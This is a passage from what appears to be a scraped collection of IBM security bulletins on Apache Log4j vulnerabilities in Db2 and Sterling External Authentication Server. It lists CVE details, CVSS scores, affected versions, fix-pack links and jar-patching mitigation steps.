vulnerable jar can be patched to mitigate the vulnerability. 
\nNote: Do not issue START/STOP Db2 text search server if Db2 text search is not configured.\n\nOn Linux and Unix:\n\nStop the TextSearch server: \"db2ts stop for text\".\n\nRemove the JMSAppender.class file using one of two options: \nHere is the command:\n \n \n zip -d log4j-1.2.17.jar org/apache/log4j/net/JMSAppender.class\n \n\nIf you do not have access to 'zip', you can also use the 'jar' command.\n \n \n #assume log4j-1.2.17.jar exists in current directory\n mkdir tmp\n cd tmp\n jar xvf ../log4j-1.2.17.jar\n rm org/apache/log4j/net/JMSAppender.class\n jar cvf ../log4j-1.2.17-patched.jar .\n cd .. \n rm log4j-1.2.17.jar \n ln -s log4j-1.2.17-patched.jar log4j-1.2.17.jar\n rm -rf tmp \n \n\nStart the TextSearch server: \"db2ts start for text\".\n\nOn Windows, the Java jar tool can be used from CMD to follow steps similar to the Unix jar instructions.\n \n \n Stop the TextSearch server: \"db2ts stop for text\" in the Db2 command line.\n Start the Windows CMD program and go to the SQLLIB\\db2tss\\lib directory which is found in the installation path e.g. \"cd C:\\ProgramFiles\\IBM\\SQLLIB\\db2tss\\lib\"\n Make a copy of the log4j-1.2.17.jar file e.g. \"copy log4j-1.2.17.jar log4j-1.2.17.jar.bak\"\n Make a new directory e.g. \"mkdir tmp\"\n Change to the new directory e.g. \"cd tmp\"\n Extract the jar file using the jar program found in the JDK that is in the SQLLIB\\java path e.g. \"..\\..\\..\\java\\jdk\\bin\\jar xvf ..\\log4j-1.2.17.jar\"\n Delete the JMSAppender.class file e.g. \"del org\\apache\\log4j\\net\\JMSAppender.class\"\n Package the files back into the jar e.g. \"..\\..\\..\\java\\jdk\\bin\\jar cvf ..\\log4j-1.2.17-patched.jar .\"\n Replace the log4j-1.2.17.jar with log4j-1.2.17-patched.jar. e.g. \"cd ..\", \"del log4j-1.2.17.jar\", \"ren log4j-1.2.17-patched.jar log4j-1.2.17.jar\".\n Cleanup the \"tmp\" folder.\n Start the TextSearch server: \"db2ts start for text\" in the Db2 command line. 
\n \n \n \n \n \n\nFor version 11.1 on linux and unix platforms only (not on Windows), the log4j-1.2.17.jar file under \"/opt/IBM/db2/V11.1/federation/restservice/hadoop\" in the Db2 installation location may be safely removed. \n \n\n\nSubsequent installation of fixpacks may result in the error:\n\nERROR: Some error occurred while moving files during backup or restore to directory, \"/opt/IBM/db2/<version>/.backup\". The return code is \"4394967295\".\n\nTo resolve this apply the fixpack with the -f nobackup flag.\n\nThis file does not exist on Db2 versions prior to 11.1\n\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\nSee [Security Bulletin: A vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6549888> \"Security Bulletin: \u00a0A vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \u00a0\\(CVE-2021-44832\\)\" )\n\nSee [Security Bulletin: Multiple vulnerabilities in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-45046, CVE-2021-45105)](<https://www.ibm.com/support/pages/node/6528672> \"Security Bulletin: \u00a0Multiple vulnerabilities in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \u00a0 \\(CVE-2021-45046, CVE-2021-45105\\)\" )\n\nSee [Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae 
(CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6526462> \"Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \\(CVE-2021-44228\\)\" )\n\n## Acknowledgement\n\n## Change History\n\n06 June 2022: Added mitigation to remove log4j from hadoop wrapper on linux/unix and links to other related Log4j bulletins \n31 Jan 2022: Added 10.5 links for Windows 64-bit and Windows 32-bit fix packs. \n31 Dec 2021: Added 10.5 links for AIX 64-bit, Linux 32-bit and Linux 64-bit fix packs. \n29 Dec 2021: Added 11.1.4.6 links for Windows 32-bit and Solaris 64-bit fix packs \n28 Dec 2021: Updated ECM Text Search section to reflect that: text search server should not be stopped or started if the customer is not using text search, and added the instructions to copy the patched jar in place of the original. \n24 Dec 2021: Removed Install section as impacted as further investigation determined that Installation Manager was not affected by this vulnerability, thus Db2 is not vulnerable from that dependency. Added 11.1.4.6 link for Windows 64-bit fix pack \n22 Dec 2021: Added 10.5 link for Inspur. Clarified server and client impact for each issue \n21 Dec 2021: Added 11.5.6 links for Windows 32-bit and Windows 64-bit fix packs. Added 11.5.7 links for Windows 32-bit and Windows 64-bit fix packs \n21 Dec 2021: Updated note that the 11.5.6 builds are the same as the one for CVE-2021-44228. Updated description of Db2 Text Search update. \n20 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Product\":{\"code\":\"SSEPGG\",\"label\":\"DB2 for Linux- UNIX and Windows\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"10.1, 10.5, 11.1, 11.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-07T14:36:22", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-4104)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-06-07T14:36:22", "id": "E8825B71ACE31BFAA5662E2357C5EEB425BA842AC21E60C761364799BFD2FEE3", "href": "https://www.ibm.com/support/pages/node/6528678", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:45:18", "description": "## Summary\n\nIBM Sterling External Authentication Server is vulnerable to an arbitrary code execution due to Apache Log4j, which is used for logging (CVE-2021-44832). The fix upgrades all Apache Log4j 1.x to Apache Log4j 2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Sterling External Authentication Server| 6.0.3 \nIBM Sterling External Authentication Server| 6.0.2 \nIBM Sterling External Authentication Server| 2.4.3.2 \n \n\n\n## Remediation/Fixes\n\nProduct| VRMF| iFix| Remediation \n---|---|---|--- \nIBM Sterling External Authentication Server| 6.0.3| iFix 01 Plus Build 141| [Fix Central - 6030](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=6.0.3.0&platform=All&function=all> \"Fix Central - 6030\" ) \nIBM Sterling External Authentication Server| 6.0.2| iFix 04 Plus Build 214| [Fix Central - 6020](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=6.0.2.0&platform=All&function=all> \"Fix Central - 6020\" ) \nIBM Sterling External Authentication Server| 2.4.3.2| iFix 13 Plus Build 296| [Fix Central - 2432](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+External+Authentication+Server&release=2.4.3.2&platform=All&function=all> \"Fix Central - 2432\" ) \nThis fix also remediates CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832. 
\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n07 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS6PNW\",\"label\":\"IBM Sterling Secure Proxy\"},\"Component\":\"Sterling External Authentication Server\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"}],\"Version\":\"6.0.3, 6.0.2, 2.4.3.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-07T19:03:49", "type": "ibm", "title": "Security Bulletin: Apache Log4j vulnerability affects IBM Secure External Authentication Server (CVE-2021-4104)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-07T19:03:49", "id": "B47B01CFCEE320F0AE033C32D22579706D0B59585EDEDF3D908CA06FA3E92084", "href": "https://www.ibm.com/support/pages/node/6538954", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-11T21:28:09", "description": "## Summary\n\nApache Log4j open source library used by IBM\u00ae Db2\u00ae is affected by multiple vulnerabilities that could allow a remote attacker to execute arbitrary code on the system or cause a denial of service. This library is used by the Db2 Federation feature. The fix for the vulnerability is to update the Apache Log4j library to 2.17.0. Please see CVE-2021-4104 for bulletin relating to Log4j V1. 
Please see CVE-2021-44832 and CVE-2021-44228 for bulletins relating to Log4j V2.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nFix pack levels of IBM Db2 V11.5 for all editions on all platforms are affected only if the following features are configured:\n\nFederation: \n\n * DVM JDBC wrapper driver,\n * NoSQL wrapper driver (for Hadoop),\n * Blockchain wrapper driver (for Hyperledger Fabric, Linux 64-bit, x86-64 only)\n\nIBM Db2 V9.7, V10.1, V10.5 and V11.1 are not affected. Please note that log4j v1.x was removed in a previous build, and customers are strongly recommended to apply those fixes if you are on an older version of Db2. See [Security Bulletin](<https://www.ibm.com/support/pages/node/6528678> \"Security Bulletin\" ) for details. \n\n\nTo determine if Federation is enabled, issue the following:\n\ndb2 get dbm cfg | grep FEDERATED\n\nIf a value of NO is returned, you are not vulnerable.\n\nYou can determine if you are using one of the affected wrappers by performing:\n\nTo determine if the DVM JDBC wrapper is in use, issue the following statement:\n\ndb2 \"select servername from syscat.serveroptions where option = 'DRIVER_CLASS' and setting = 'com.rs.jdbc.dv.DvDriver'\"\n\nIf a servername is returned, then you are using the DVM JDBC wrapper via the DvDriver class.\n\n \nTo determine if the NoSQL hadoop wrapper is in use, issue the following statement:\n\ndb2 \"select * from syscat.servers where servertype = 'HDFSPARQUET'\" \n\nIf 1 or more rows are returned, then NoSQL hadoop wrapper is in use.\n\nTo determine if the NoSQL Blockchain wrapper is in use, issue the following statement:\n\ndb2 \"select * from syscat.serveroptions where option='PEER_URL'\"\n\nIf 1 or more rows are returned, then NoSQL Blockchain wrapper is in use.\n\n## Remediation/Fixes\n\nCustomers running any vulnerable fixpack level of an affected Program, V11.5, can download the special build containing the interim fix for this issue from Fix Central. 
These special builds are available based on the most recent fixpack level for the V11.5.6 and V11.5.7 release. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.\n\nNote: These builds supersede the builds provided for resolution to [CVE-2021-44228](<https://www.ibm.com/support/pages/node/6526462> \"CVE-2021-44228\" ) and [CVE-2021-4104](<https://www.ibm.com/support/pages/node/6528678> \"CVE-2021-4104\" )\n\n**Release**| **Fixed in fix pack**| **APAR**| **Download URL** \n---|---|---|--- \nV11.5| TBD| [IT39474](<https://www.ibm.com/support/pages/apar/IT39474> \"IT39474\" )| Special Build for V11.5.6: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13478_135867_DB2-aix64-universal_fixpack-11.5.6.0-FP000%3A427692916793185792&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13478_135868_DSClients-linuxia32-client-11.5.6.0-FP000%3A229400084660469792&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13478_135870_DB2-linuxx64-universal_fixpack-11.5.6.0-FP000%3A138274479725175920&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little 
endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13478_135866_DB2-linuxppc64le-universal_fixpack-11.5.6.0-FP000%3A979582216771911552&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13478_135869_DB2-linux390x64-universal_fixpack-11.5.6.0-FP000%3A276882097350046112&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13478_135865_DSClients-nt32-client-11.5.6000.1809-FP000%3A661797018354168448&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13478_135864_DB2-ntx64-universal_fixpack-11.5.6000.1809-FP000%3A583179472819140992&includeSupersedes=0> \"Windows 64-bit, x86\" ) \n \nV11.5| 11.5.8| [IT39474](<https://www.ibm.com/support/pages/apar/IT39474> \"IT39474\" )| <https://www.ibm.com/support/pages/node/6830623> \n \n \n## Workarounds and Mitigations\n\nNone.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) 
\n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\nSee [Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-4104)](<https://www.ibm.com/support/pages/node/6528678> \"Security Bulletin: \u00a0Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \u00a0 \\(CVE-2021-4104\\)\" )\n\nSee [Security Bulletin: A vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6549888> \"Security Bulletin: \u00a0A vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \u00a0\\(CVE-2021-44832\\)\" )\n\nSee [Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6526462> \"Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \\(CVE-2021-44228\\)\" )\n\n## Acknowledgement\n\n## Change History\n\n11 Nov 2022: Updated 11.5 links to 11.5.8 \n06 June 2022: Added cross reference to other Log4j bulletins \n28 Jan 2022: Added clarification for not affected versions. \n27 Dec 2021: Added 11.5.6 link for Windows 64-bit fix pack \n24 Dec 2021: Added 11.5.7 links for Windows 32-bit and Windows 64-bit fix packs \nAdded 11.5.6 link for Windows 32-bit fix pack \n21 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Product\":{\"code\":\"SSEPGG\",\"label\":\"DB2 for Linux- UNIX and Windows\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"11.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-11T17:20:42", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-45046, CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": 
false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-11-11T17:20:42", "id": "CDB95A8580AD247B239607B2769A506C10A81055AF8F4063AA0D26A850A33B58", "href": "https://www.ibm.com/support/pages/node/6528672", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-11T21:28:06", "description": "## Summary\n\nThe Apache Log4j open source library used by IBM\u00ae Db2\u00ae is affected by a vulnerability that could allow a remote attacker to execute arbitrary code on the system. This library is used by the Db2 Federation feature. The fix for the vulnerability is to update the log4j library to version 2.17.1. Please see CVE-2021-4104 for bulletin relating to Log4j V1. Please see CVE-2021-45046, CVE-2021-45105 and CVE-2021-44228 for bulletins relating to Log4j V2.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nFix pack levels of IBM Db2 V11.5 for all editions on all platforms are affected only if the following features are configured:\n\nFederation: \n\n * DVM JDBC wrapper driver,\n * NoSQL wrapper driver (for Hadoop),\n * Blockchain wrapper driver (for Hyperledger Fabric, Linux 64-bit, x86-64 only)\n\nIBM Db2 V9.7, V10.1, V10.5 and V11.1 are not affected by this issue. Please note that log4j v1.x was removed in a previous build, and customers are strongly recommended to apply those fixes if you are on an older version of Db2. See [Security Bulletin](<https://www.ibm.com/support/pages/node/6528678> \"Security Bulletin\" ) for details.\n\nTo determine if Federation is enabled, issue the following:\n\ndb2 get dbm cfg | grep FEDERATED\n\nIf a value of NO is returned, you are not vulnerable.\n\nYou can determine if you are using one of the affected wrappers by performing:\n\nTo determine if the DVM JDBC wrapper is in use, issue the following statement:\n\ndb2 \"select servername from syscat.serveroptions where option = 'DRIVER_CLASS' and setting = 'com.rs.jdbc.dv.DvDriver'\"\n\nIf a servername is returned, then you are using the DVM JDBC wrapper via the DvDriver class.\n\n \nTo determine if the NoSQL hadoop wrapper is in use, issue the following statement:\n\ndb2 \"select * from syscat.servers where servertype = 'HDFSPARQUET'\" \n\nIf 1 or more rows are returned, then NoSQL hadoop wrapper is in use.\n\nTo determine if the NoSQL Blockchain wrapper is in use, issue the following statement:\n\ndb2 \"select * from syscat.serveroptions where option='PEER_URL'\"\n\nIf 1 or more rows are returned, then NoSQL Blockchain wrapper is in use.\n\n## Remediation/Fixes\n\nCustomers running any vulnerable fixpack level of an affected Program, V11.5, can download the special build containing the interim fix for this issue from Fix Central. 
These special builds are available based on the most recent fixpack level for the V11.5.6 and V11.5.7 release. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.\n\n**Release**| **Fixed in fix pack**| **APAR**| **Download URL** \n---|---|---|--- \nV11.5| TBD| [IT39584](<https://www.ibm.com/support/pages/apar/IT39584> \"IT39584\" )| Special Build for V11.5.6: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13806_140511_DB2-aix64-universal_fixpack-11.5.6.0-FP000%3A845800489744802176&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13806_140509_DSClients-linuxia32-client-11.5.6.0-FP000%3A517046716861436544&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13806_140512_DB2-linuxx64-universal_fixpack-11.5.6.0-FP000%3A956085215716772224&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13806_140513_DB2-linuxppc64le-universal_fixpack-11.5.6.0-FP000%3A437126386150870272&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or 
